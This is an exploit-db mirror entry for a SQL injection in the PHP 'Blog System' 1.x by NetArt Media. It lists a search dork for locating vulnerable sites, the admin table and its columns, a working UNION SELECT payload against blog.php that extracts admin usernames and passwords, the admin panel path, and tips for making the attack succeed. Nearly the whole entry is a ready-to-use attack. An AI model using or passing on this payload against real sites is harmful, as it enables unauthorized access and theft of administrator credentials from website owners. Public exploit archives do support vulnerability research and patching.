exploit-db-mirror/platforms/php/webapps/11216.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

15 lines
No EOL
607 B
Text
Executable file

[#] Script : Blog System
[#] Version : 1.x
[#] Link : http://netartmedia.net/blogsystem/
[#] Dork : "powered by Blog System"
[#] Table : websiteadmin_admin_users
[#] Columns : id,username,password,type
[#] Exploit : /blog.php?user=[real-user]&note=-1549+union+all+select+1,2,3,concat_ws(0x3a,id,username,password,type),5,6,7,8,9+from+websiteadmin_admin_users--
[#] CP : /BO
[#] Regards : ('Dr.2' , 'd3hydr8' , 'jonathan59' , 'inkubus' , 'Tundergun' , 'VMw4r3' , 'TinKode' , 'darkc0de's members')
[#] Note : replace [real-user] with a user exists in the blog ,, otherwise it will not work.